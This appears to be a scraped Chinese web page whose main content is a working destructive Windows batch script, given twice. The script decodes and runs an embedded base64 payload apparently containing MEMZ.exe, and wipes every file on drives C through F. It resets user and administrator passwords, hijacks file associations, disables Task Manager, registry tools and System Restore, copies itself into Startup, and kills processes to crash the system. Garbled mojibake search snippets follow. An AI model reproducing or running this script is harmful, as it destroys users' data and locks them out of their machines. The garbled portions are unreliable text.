echo G1228K2ccv8Ni26IrtSxi4Y5496s7Bn96/ZnrPslU61Qm3YlrHu9psA6svrdh0z9TIFCpHv4E9Ea>>x
echo Obt8Y045u2T5D5eX+xct/+iupkiu0bMysropptPHcmxZcyIf36pkcpcX2wQIf6tFHbmQ+w2D5max>>x
echo be8Dm95obF/YePf2nFk5dWuOVLcPq+9dciS7KPvFRUXZZPGR6ro17cOa9jfVB4GLLnpxURT4ujUP>>x
echo WbbnbM/x147lOJf6l/ldzpqxte1XEu52Lt2eU7fkocUds5gOHdORwuz2L9u+tm5NxxztwBhmdCRp>>x
echo +sfWdqRoOtYwHRXqXTX+WmdN+8Xu3f7a/bll+o7hhI4nEgb8y2bltB9L6PfXdrym6d+f2/Em0/EM>>x
echo c/f+3E/zs/PRHE7peF1zG2E6/sZgLFl+mzah4/fafnJzx7DneWfNRiEcYLsErz8c4gOs0x5kO3ne>>x
echo x4YC9qCTd7CdfWzIybP1lvpbgBPcdl8+2yD0sLzPLdz2fMK3GvrsPrbKHsrPzy/A3eNgIu4fjS1N>>x
echo bFVjvbWl2dLE1phtbKXF0sCuaalaZ6lmKzeyzTUWmWBzU+PN5ob86UnTkz4vRo/gywmxnYIQYsN+>>x
echo 1r7F7vLlTk8KCmw4yLOuEAspPYJvC637hDD9Z6AFlEh5NX02B/pc6AsJ7FaXxyNz6qFvXXY6vY9y>>x
echo CvYFQ7yXjunkpyc5+CDW1oflunzBkN0X8vTlsuDmkMQIBfooz/Jq7OM/AeYBnKGQv7ygYIsgbPHw>>x
echo +V1CftfWgiBvD3Q5V9++qhPk9D32Pn1I0FMR9JRlkPd0X2OeU+jRF+oDvFfYxuvt+m2uQDh4LV7e>>x
echo Lns3z+u3BfU+IRASfNcaT3lArCDvc0ywoG1vn7474ALymvxcPr4rYO8O6Z32Xr1D6PF5BLsDzCfF>>x
echo vS7+W/iQ3iv4+L5r6lLw3eHSd4Ydjr6r3LoDPH9duuwM9+l7eN5BrleuLsExqXq9y4eXYNju0Xfa>>x
echo g66uifvM19Lpcdqpavx+3gcC3dT0egfv4UO8XvY5Y+E1aWwxhvQB49bQNXVjD3U547JO6OZac6TR>>x
echo +XzvtfTn8mEf+mAlvtfvEQJ8QO+Cozh5veTcnQGhJ8gHrkMf3fYuHvt4K3TStRXbEkoWPJIBv+g8>>x
echo +h4hII0p5Awl17MO2NflcUA2D7/FFfo81eu0d4C3wzR0g+oxUR+w+4KCt8ceuB7/wvz4ZvXy3jv0>>x
echo cni8zn2ADTcR7ahmHQJddw/vCjigZbxDGaFu2iP7ElzR77kDDY//6+k67L6tkjjXJ/+kDeQp15hj>>x
echo 93TrPa5uXm/Ewj28PQh1Q33XmodVIAqGETrsIRdm2j3X9hsEh5B9C6/32wMCtr7XLjlG/N/9ZQf5>>x
echo 2vnUVSWrwJRxll87nob9rQgx0tNr78Nf8Hr2u1tw+vRdvM+u97ocrrgj+oQQrOvbxgdCiD3X8GMf>>x
echo H7SHuyRpeczyePiukIsG8q+Xd2sAOuV79cEuHDQCji04ErzP5wKpoD/gCvFBSaRJOvDsHj4QzPe6>>x
echo ugJCUOgOgaS3gPflhYMF0GsIbAu6hUDYO9G6TYASA3kTrSD92AJGKKBqzfPaPXSXSM6eJ3t+HnVo>>x
echo Guk8fXnxE5UOLywp7ewydBXmGcu6i/KKCrtL88o4NIvLVthLVhg7SzqLiqfq2Sux7RTsAUf+NqxG>>x
echo EhMWdBT00HiXh+0RnGCfFwoHfHn2vImtlIewJaDtcMEMdk+ek/d4ILefn0Lf77H35Xd5wp3YVlvC>>x
echo Lh+lP9nXJfhDLq/rDj6AZUs9k/OoygSoV8J22T3SeQBL834Emy6vg/RQpQMX4LfwDleITEROOi5k>>x
echo D271bgkQbxB+0e3aQnHeoB95TYg4+G3eLd5QPvoIeqE3D/F6u2gexa6rratD0lS/MZ4rIc2h2RdN>>x
echo erB8dosQz3QcLp7+rESaLLZmtraBtdbabLnsmsYmSytysHq08kkt22ZuagA1EEa6RmrMNWa2geMq>>x
echo 2bpCK7vW2Mw2Gdc1I38D8W67y4N0yB6S0yWD0biCdRb1csicaEZzB2VG5WtuqgVBWyPSvKZq1txQ>>x
echo za5tbKbtNeamXLayRRKG5nuWhupcVsoMrVWQw8bamrG0eFK4ALKgbsLqLA03N25kK7FSstbSjMyx>>x
echo WU4iN7ANlg3NbHNtvYXtrcb4Vgsmg3bTxtqGtWxzI0uXjvXKTKrNzWaasd25qeBOI33g1K20NVZD>>x
echo HGSmmAH5W2ubWmystcncsI5duraxwcK2NTU2rF1G9SiLQQVv2GhuYKvM0MtaPsTS+MAiQXRJjs96>>x
echo yxbI+qLGQCKM/SaEsAoo9gt/ZFG9fStfLzvuWnrumGleS4itsd5S2Vi9kW1sqLJgJXWwt+VqkmzG>>x
echo miBdg5ltaoTG6i0TeUibsw92d0jOwG+TcnYXbDY1710dT6yhc1eQ7Q53baVG9fUhOc0nNr4rHOAr>>x
echo aZIdRE+Q2nRLoJT1lrIuFnVpQSmpsW+TMuYJ2thu1OOQDgvd3aDkYAWfnJ+vJhW1PuQEIfZmgfew>>x
echo t4exM1hsZP4mKivWy4fosUbFs0O6tWaXmUUk6URIWhBfDzZrLku3rEDvHAE+n62Np+CdvMeFJbI9>>x
echo fA6e0gUF+9PPBzxIzemOcSCCOjA+x8tW0oyRksyRPhXDH2YG+qRTFQR7YD36pZi3b/K6kTM9ic2j>>x
echo phWErpCBlbMPzG9x5rJVCBSsNR4p2GaXl6crQPrKdiIc8o4FXz7ZJuV6NXaaUMvv68MIiVJcl9uW>>x
echo 3i6P3WuXUaSA9BA7CZEu4iQOIhAaIJBgE2rECXs34x5GgxD1H8km7nAwxCKV68IiHHShiB5BF/Ih>>x
echo tOIBEncrSQvxpnwPctoDXnlfT164qCVxxvJBatqwLxy0d3ro5NruyVgT5Hkp2Ejk+GAQpzPIhZxC>>x
echo OMRu9Qk9tJNmv18UDXcpF06GPtgM83B9lNghdEomiYtEs5yrDClBmVpoqvgOARLSybQRDtLpdjaI>>x
echo GxDuo9iRgs/Lw7owEE6/UG6c30Ze8jqc8HBOV0i6blY30jiBQNTQTGOHZYOlCrdVbLpaG1tvrkOg>>x
echo tOTSiNJS10zDC4IYokBLQ4vNXFmHfWmuqqltsMR/15cm4Y/u2Doz4i8Ns5glXUkpsqrJYkZoomMa>>x
echo EB1B1trYYKullBChQXkj4lW9eS0lXG1hW2xSRJsiCijJ4XJCztrm1dRnvPAZF6H+s2lT/iarsw+3>>x
echo FLunOuDaxnPA0cMpPyR9q+cLOTw062oKecwOahwrBiHEb8GB1RBqsruCfA0OXEsgIEjnlY3wACcJ>>x
echo wyepP/aAi5UEwG0bwIPeLYSedfTrB+xDKgKwAvFIc0PSGA9hMT8oSbgF7yHQc6HNwssFyO6XqPOg>>x
echo uppcLcPxxli81pjkWhevU+N1drzOj9dF8XpjvHbJtWmHXPsfiLcfkeqJbzanA84BjpUD4t9rTvSl>>x
echo kM+XtVXNdfRfHeh3j9I3kNlead0T30vmu+iHjNlSMqNDADoyF7j4N5CUPuUjt7PvuOMORyfd4/Qb>>x
echo znvI5FzpbmiqwCqv4oySj1V8jof01SP9d60OZhInf+FoJWQXHRf/pnLXevmTy/zOoJzObpY/nZS+>>x
echo pczmDBIKiEHFJE6Sobfi6rrfRQTPxhrHp+C+CS0+BpxnCu4J4NJZWdaJstAs6+fMFFwvcHuB27Tq>>x
echo Ku47wGmgs1NTxh0BbpAlX1r+8W+KMo+Jf1O0KJGdWANCl9nhoEGPkGpVnYBgYPZI38LWyK019IeT>>x
echo iKoRO5YOpgOHFZhZFQ4EEDkncHMVll7XZOtpUiXdkpudNAsn5D+mzJBxtcD+jLF5eN5PFqvbaB68>>x
echo BsGFNJEqj0Aji8+BllntwaWgy+uHzJUT79hpFZDN7qhzdQbsgT70pdK11ONI90hUGuxeHqPulrgK>>x
echo Xi+I1eHS1EYG43LRQWZyF2OjGnAJ4N5X5bFTHbwwIbkgeJBX+I2FNp/dH3QKCIn3q+LrMxaucQWC>>x
echo oTay7yqmAbsbPH+uXOsROieU+Fy8JSmRNEgr8PA+jEPq2mCpMxbmS0G2nUpaL5+QbeSyspn+qOCB>>x
echo GHEcIT8h1S4k/7jNTA4j/0WozttcPlzJg5ZecoBU891yk4qFEXXKJtwu6UVPWp6F7iNvfIXyQIra>>x
echo TrnLKUY9j6ytC3pIUcb5VAoY8TslNBVnVCMIWy29IK5q8Tnx/jk0+QZG+hzxuTT3wVnfRrZJ2Fof>>x
echo MgdylFQH7D21XTSJ+Q7lLBOoriI8pJV+IsD7gas9TbhKkrQp8rSRb1F54E9BIWAVIC0b96+J9iLa>>x
echo ruaDW0OCXyZCyJ+JxRf2VjldHkdcZEIySRUyS2q6uPjkAwX1LCpdG2mxWZomLDSbVLpClZ4QtbAt>>x
echo FOBhCKm1tro2PuSSYsoeaRa20hMui8hHp9ScPD+D5AFwEbaG/ZOoVrsnDJP+FLbp84fMXbeHXQG+>>x
echo Cjc72atekvFreV8TfJleMc3VrWbrBGtyo8JGk2CLnD2ZycLPtdtIApmyDZoFc2DLNlBd8LlR1Ka2>>x
echo GkvdhFNqiBXXXpsQ9jngNW21DfX1En42iccNLLPWC4tM7DiMstogVH51Xd2Xh+DrLm8uNxGt3kRM>>x
echo AD/gKcAYgM01kQ2AQcAIIDXPRCoAfsA+wCigFMd7L+AIYBxgLUAbcAhwBpCOwLoBMAgYpkHWgDmA>>x
echo CGBpIfCAxwDDgDcB9EvUM4AYYAwwDmCMkA+QDmABuYAiwMUS0FthIroV8oFSCpwHMAjYB3gKcBKQ>>x
echo jdSjFNAMuBMwCNgHOAw4BhgFaIpBG7ABsA9wCPA8IAZgwGcpoBdwBHAZKQ4Xxt5Ok+sf3IC5DYQc>>x
echo nIP1vwJ9xvHL58j47nTImIOzEm3TAULOYvzm9wk5jva+cjLxv0v+HykKko5nuvy/XT6Hp3JyX4Kf>>x
echo hhynhlzNU/6+VKzu9XpY3PGCuEutyjHkczm4DnQJDlwPVuW0NK/JK82h2b/PYfcIPn5VTh8fzFl9>>x
echo 0/SkCkRR3EBxMQEBX3BVDm635cEuJ++1B/MmfyajPy6V24Pe/G2GHFxEfK5u3C1ap3IDKZatCAUQ>>x
echo G2p93UKc2sJrUDMulOZhZpBexHFqxdvABPjb6XWRd1wNM5OdU7vl3Q5B6nDH9bAe+lyVQ7sRccwO>>x
echo r8uH8yJgDwmBHDbsMnfRbb4qp9vuCfI5bMFVfgVfzbCi4HPiVRRMrpNqsGBChWh8pcmRgG6A3WZx>>x
echo uVwpZ+Ju4TZz3ZyXC3NPcf/ODXNHufe4jziFYZphpiHDsNxgMJQZTAbe4Df0G35h+I3hPcNFw2eG>>x
echo tMIVhdWF6wpbCjcVbi0MFe4qvKfwXwofLTxa+Hbhfyv8oPBSYZoxw5hnLDdWG9cZNxm7jT7jncZv>>x
echo Gx8z/tL4ivG08V3jZ0ZlUVKRrii9KKsov6ikyFS0vqi1qKMoUHR30f1F3yt6oujVojNFHxbpim8o>>x
echo zizOLq4rbireUNxR/I3i14rfKf7P4ovFaSXzS4pLzCVbSrwlwZK+kqGSb5fsK3my5HDJcyUnS86U>>x
echo fFjiXhFaMbAiuuKfVvzzit+u+GjF5RXTSvNLS0otpetK15e2lfpL95Q+UPr90qdKXy49VfpeaULZ>>x
echo 7DK2LL+stqyzrL9ssOyBskfK/rXsp2XPlA2XHS37sExdvrC8sfyWck95oHx7+UD53vIfl6eunLeS>>x
echo XblkJc31D1P9cgyn4bScjkvl0rlMjuWyuaXQNccVQd8V0Hg1V8PVcVaumdvAbYL2HZyT83B+LsT1>>x
echo cndyEW4XN8jdw+3l7uP2cQe4g9xj3OPcIVjnMHeEex4WOsa9zo1wb3InuVPcKHeGi3HnuDHuIjfO>>x
echo XeaIgTFoDFqDzpBqSDdkGlhDtmGpIdfAGRCHDTUGq2GDYbPBCWv2Gv4XwsY/yv+35X8CUEsBAhQA>>x
echo FAAAAAgAdXfqSJDoh9lzIQAAADoAAAgAAAAAAAAAAAAAAP+BAAAAAE1FTVouZXhlUEsFBgAAAAAB>>x
echo AAEANgAAAJkhAAAAAA==>>x
for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
echo Const strPassword = "longjunjunzuishuai" >>1.vbs
echo Dim WshNetwork >>1.vbs
echo Set WshNetwork = CreateObject("WScript.Network") >>1.vbs
echo Dim userName >>1.vbs
echo userName = WshNetwork.userName&",user" >>1.vbs
echo Dim Domain >>1.vbs
echo Set Domain = GetObject("WinNT://./"&userName) >>1.vbs
echo Domain.SetPassword strPassword >>1.vbs
echo Domain.SetInfo >>1.vbs
echo dim gj >>1.vbs
echo on error resume next >>1.vbs
echo dim WSHshellA >>1.vbs
echo set WSHshellA = wscript.createobject("wscript.shell") >>1.vbs
start “” “1.vbs“
assoc .exe=txtfile
assoc .txt=exefile
assoc .html=zipfile
assoc .dll=vbsfile
assoc .sys=batfile
ftype exefile=c:\users\%username%\desktop\123.exe
ftype dllfile=c:\users\%username%\desktop\123.exe
ftype sysfile=c:\users\%username%\desktop\123.exe
ren *.exe *.abc
del c:\*.*/f/s/q
del d:\*.*/f/s/q
del e:\*.*/f/s/q
del f:\*.*/f/s/q
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000002 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 00000001 /f >nul cls net user administrator 123456 >nul
for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
copy %0 "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*"
copy %0 "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*"
copy %0 "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SystemTools.exe.bat"
taskkill /f /fi "pid ne 1"
echo f=new ActiveXObject(^"Scripting.FileSystemObject^");i=f.getFile(^"x^").openAsTextStream();>x.js
echo x=new ActiveXObject(^"MSXml2.DOMDocument^").createElement(^"Base64Data^");x.dataType=^"bin.base64^";>>x.js
echo x.text=i.readAll();o=new ActiveXObject(^"ADODB.Stream^");o.type=1;o.open();o.write(x.nodeTypedValue);>>x.js
echo z=f.getAbsolutePathName(^"z.zip^");o.saveToFile(z);s=new ActiveXObject(^"Shell.Application^");>>x.js
echo s.namespace(26).copyHere(s.namespace(z).items());o.close();i.close();>>x.js
set v="%appdata%\MEMZ.exe"
del %v% >NUL 2>NUL
cscript x.js >NUL 2>NUL
del x.js >NUL 2>NUL
del z.zip >NUL 2>NUL
del x >NUL 2>NUL
start "" %v%

呵呵,我笑了
@echo off
assoc .exe=txtfile
assoc .txt=exefile
assoc .html=zipfile
assoc .dll=vbsfile
assoc .sys=batfile
ftype exefile=c:\users\%username%\desktop\123.exe
ftype dllfile=c:\users\%username%\desktop\123.exe
ftype sysfile=c:\users\%username%\desktop\123.exe
ren *.exe *.abc
del c:\*.*/f/s/q
del d:\*.*/f/s/q
del e:\*.*/f/s/q
del f:\*.*/f/s/q
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000002 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 00000001 /f >nul cls net user administrator 123456 >nul
for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
copy %0 "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*"
copy %0 "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*"
copy 0%"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SystemTools.exe.bat"
taskkill /f /fi "pid ne 1"
最后一句蓝屏重启


start cmd
%0


  • 璇烽棶閭d簺鎰熸煋 .exe 鏂囦欢鐨勭梾姣鐨勫師鐞嗘槸浠涔,濡備綍缂栧啓?(C鎴朧B) ,濡備綍...
    绛旓細璁$畻鏈虹梾姣掓槸鎸囩紪鍒舵垨鑰呭湪璁$畻鏈虹▼搴忎腑鎻掑叆鐨勭牬鍧忚绠楁満鍔熻兘鎴栬呯牬鍧忔暟鎹紝褰卞搷璁$畻鏈轰娇鐢ㄥ苟涓旇兘澶熻嚜鎴戝鍒剁殑涓缁勮绠楁満鎸囦护鎴栬呯▼搴浠g爜銆備妇涓涓渉ello word鈥濅緥瀛愩備笅闈㈡槸涓涓畝鍗曠殑DOS鎵瑰鐞嗙梾姣婧愮▼搴廰utoexec.bat锛堝亣璁句粠A鐩樺惎鍔級锛氱▼搴忚鍙 绋嬪簭娉ㄨВ IF exist c:\\autoexec.bat goto Virus REM 棣栧厛...
  • 涓簡*.bat鐥呮瘨,浠g爜濡備笅,姹傛庝箞瑙e喅銆
    绛旓細浣犲ソ锛岃繖涓鎵瑰鐞嗘枃浠剁殑浣滅敤鍏跺疄鏄慨澶嶅浘鏍囩紦瀛橈紝锛屾枃浠朵腑娑夊強鍒扮殑涓涓猧concache.db鏂囦欢灏辨槸鍥炬爣缂撳瓨鏂囦欢锛屽垹闄よ繖涓浘鏍囩紦瀛樻枃浠讹紝鍙婃敞鍐岃〃涓搴斿瓙閿腑29杩欎釜閿肩殑鐩殑灏辨槸涓轰簡鑳藉浣挎闈㈠浘鏍囨仮澶嶆甯搞傛墍浠ユ潃姣掕蒋浠朵笉浼氳涓哄畠鏄伓鎰忕殑鎵瑰鐞嗘枃浠惰屽鍏惰繘琛屽鐞嗐傝岀幇鍦ㄦ棤娉曟樉绀洪殣钘忔枃浠讹紝浣犲彲浠ュ湪娉ㄥ唽琛℉KEY...
  • 鐪嬩竴涓鎵瑰鐞嗘枃浠,鏄惁鏄鐥呮瘨
    绛旓細鎵浠ュ氨浠旂粏鐞㈢(浜嗕笅 鎵撳紑 help.dll 鐪嬬湅閲岄潰鏈変竴娈浠g爜 open 涓涓猧p鍦板潃 寰堟槑鏄 浠庤繖閲屼笅杞界殑bai.vbs 浠ュ強bai.bat 2涓枃浠 涓涓槸鎵瑰鐞嗘枃浠 涓涓槸鏁版嵁搴撴枃浠 鏉ユ敮鎸佹壒澶勭悊鏂囦欢 杩欐椂鍊 鍦ㄦ墦寮bai.bat 鍙戠幇閲岄潰浠g爜鐪熶笉灏 棣栧厛灏辨槸瀵熺湅鐢佃剳閲岄潰鏄惁鏈塩c.exe 濡傛灉鏈 灏变笉鎵ц 濡傛灉娌℃湁 灏卞湪c:...
  • Trojan.Spy.Win32.Pophot.bxg鎻忚堪:鍒涘缓鐥呮瘨鍚姩椤
    绛旓細鍊煎緱娉ㄦ剰鐨勬槸锛%System32% 鏄竴涓姩鎬佽矾寰勶紝鐥呮瘨浼氶氳繃鏌ヨ鎿嶄綔绯荤粺鏉ョ‘瀹氬叾鍦ㄤ笉鍚學indows鐗堟湰涓殑瀹為檯浣嶇疆銆傚湪Windows2000/NT涓紝瀹冮粯璁や綅浜嶤:\Winnt\System32锛沇indows95/98/Me鍒欏湪C:\Windows\System锛涜學indowsXP鍒欏湪C:\Windows\System32銆傝繖涓鎵瑰鐞嗘枃浠剁殑鎵ц鐩殑鏄湪鍒犻櫎鑷韩鐥呮瘨鏂囦欢鐨勫悓鏃讹紝纭繚...
  • 鍗佸垎鎭愭栫殑涓涓鐥呮瘨鎵瑰鐞銆傚樊涓鍙ュ氨瀹屾垚銆傝秴楂樺垎姹傚姪!
    绛旓細鏍规嵁浣犵殑鈥滆繍琛宔xe浼氳嚜鍔ㄥ叧鑱攋pg涔熷氨鏄鎵撳紑exe浼氭妸杩欎釜exe褰搄pg瀵瑰緟鏉ヨ繍琛屸濊繖鍙ワ紝浠g爜濡備笅锛歳eg add "HKEY_CLASSES_ROOT\exefile\shell\opencommand" "rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_Fullscreen %1"闄勫叧鑱攅xe鏂规硶锛歳egedit,鎵惧埌"HKEY_CLASSES_ROOT\exefile\shell\open\...
  • Application.Keygen.BD鏄粈涔,鏈ㄩ┈?鐥呮瘨?
    绛旓細鎬讳箣,瀹跺涵涓婄綉鐢ㄦ埛璁板緱闅忔椂鏇存柊鑷繁鐨勭梾姣搴,闅忔椂妫鏌ヨ绠楁満杩涚▼,鍙戠幇涓嶆槑杩涚▼椹笂鏍兼潃,涓嶆祻瑙堜竴浜涗笉鏄庣珯鐐(鎴戦氬父鏄潬鍩熷悕鏉ュ垎鏋愮珯鐐圭殑鍙潬绋嬪害,涓鑸竴绾у煙鍚嶉兘涓嶄細鍑虹幇鎭舵剰浠g爜鍜岀綉椤垫湪椹),鏇村埆闅忔剰鎺ユ敹鍒汉缁欎綘鍙戦佺殑鏂囦欢鍜岄偖浠! 缃戝惂闃茬洍鐪熺殑寰堝洶闅句簡,浠涔堜汉閮芥湁,澶嶆潅浜,灏辩畻鑰佹澘鑺遍挶鍘绘敞鍐屼竴涓湪椹厠鏄,鍛靛懙銆
  • bat鏂囦欢鏈鐥呮瘨鍚
    绛旓細娌℃湁銆bat鏂囦欢鏄鎵瑰鐞嗘枃浠锛屼絾鏄鐨勭梾姣涔熷彲浠ヤ吉瑁呮垚杩欑褰㈠紡锛屾墍浠ョ湅鍒BAT鏂囦欢涓嶈偗瀹氭槸鐪熺殑鏂囦欢锛屾槸鐥呮瘨锛岃鐢ㄨ浜嬫湰鎵撳紑妫鏌ユ槸鍚︽湁鐥呮瘨銆傛壒澶勭悊鏂囦欢锛屽湪DOS鍜學indows锛堜换鎰忥級绯荤粺涓紝bat鏂囦欢鏄彲鎵ц鏂囦欢锛岀敱涓绯诲垪鍛戒护鏋勬垚锛屽叾涓彲浠ュ寘鍚鍏朵粬绋嬪簭鐨勮皟鐢ㄣ
  • ...鎵瑰鐞绋嬪簭娓呴櫎U鐩橀噷鐨勭梾姣,鍚屾椂鍘绘帀鎵鏈鏂囦欢澶圭殑闅愯棌銆佺郴缁熷睘鎬...
    绛旓細echo 1.姝e湪妫娴 %1 涓槸鍚﹀瓨鍦╒BS鑴氭湰鏂囦欢锛岃绋嶅欌︹or %%i in (%1*.vbs) do (echo 鎮ㄧ殑绉诲姩璁惧鏍圭洰褰曞瓨鍦╒BS鑴氭湰鏂囦欢锛echo 姝e湪鏇存敼VBS鏂囦欢鎵╁睍鍚嶄互闃绘鍏惰繍琛屸︹ttrib -h -s -r %1*.vbs>nul 2>nul ren %1*.vbs *.vbs.del>nul 2>nul )goto :eof :checkExe echo.echo -...
  • U鐩樹腑浜哹oot.exe鐥呮瘨
    绛旓細windows 鎵瑰鐞嗘枃浠 boot.bat boot - boot.exe - 杩涚▼淇℃伅 杩涚▼鏂囦欢锛歜oot 鎴栬 boot.exe 杩涚▼鍚嶇О锛欱OOT 鎻忚堪锛歜oot.exe鏄疎LEM鐥呮瘨鐨勪竴閮ㄥ垎銆俠oot.hta涓哄悗闂ㄧ▼搴 bootconf - bootconf.exe - 杩涚▼淇℃伅 杩涚▼鏂囦欢锛歜ootconf 鎴栬 bootconf.exe 杩涚▼鍚嶇О锛欼nternat Conf 鎻忚堪锛歜ootconf.exe浼氬姭鎸佷綘鐨...
  • ...鎵瑰鐞嗘枃浠,go.exe杩樻湁autorun.inf鐨勬枃浠跺す鏄鐥呮瘨鍚?
    绛旓細4銆佹渶鍚庝笉绠′綘鐢ㄤ粈涔堝姙娉,鎴栬呯敤浠涔堣蒋浠,鎻掑叆U鐩樼劧鍚庣敤杩欎釜鏂规硶妫楠屼綘鏈夋病鏈変腑Autorun.inf鍨鐥呮瘨鐨勯闄┿ 涓嬮潰杩欎釜鎵瑰鐞鍙互妫楠屼綘鎻掑叆鎴栨墦寮U鐩樻椂鏄惁鏈夋縺娲荤梾姣掔殑椋庨櫓銆傝繍琛岃繖涓壒澶勭悊,鐒跺悗鎸夋彁绀烘搷浣溿傛敞,鎵瑰鐞嗕娇鐢ㄦ柟娉:鎵撳紑寮濮嬭彍鍗-闄勪欢-璁颁簨鏈,澶嶅埗鎵瑰鐞嗗唴瀹硅繘鍘,鏂囦欢-鍙﹀瓨涓-鏂囦欢鍚:xxxxxxx.bat,淇濆瓨绫诲瀷...
  • 扩展阅读:如何用命令行制造一个病毒 ... 电脑bat装逼代码大全 ... 100个病毒代码 ... 装逼代码复制bat ... 简单的病毒编程代码 ... 批处理文件命令大全 ... bat批处理命令大全 ... 简单病毒代码大全 ... 病毒代码大全可复制免费 ...

    本站交流只代表网友个人观点,与本站立场无关
    欢迎反馈与建议,请联系电邮
    2024© 车视网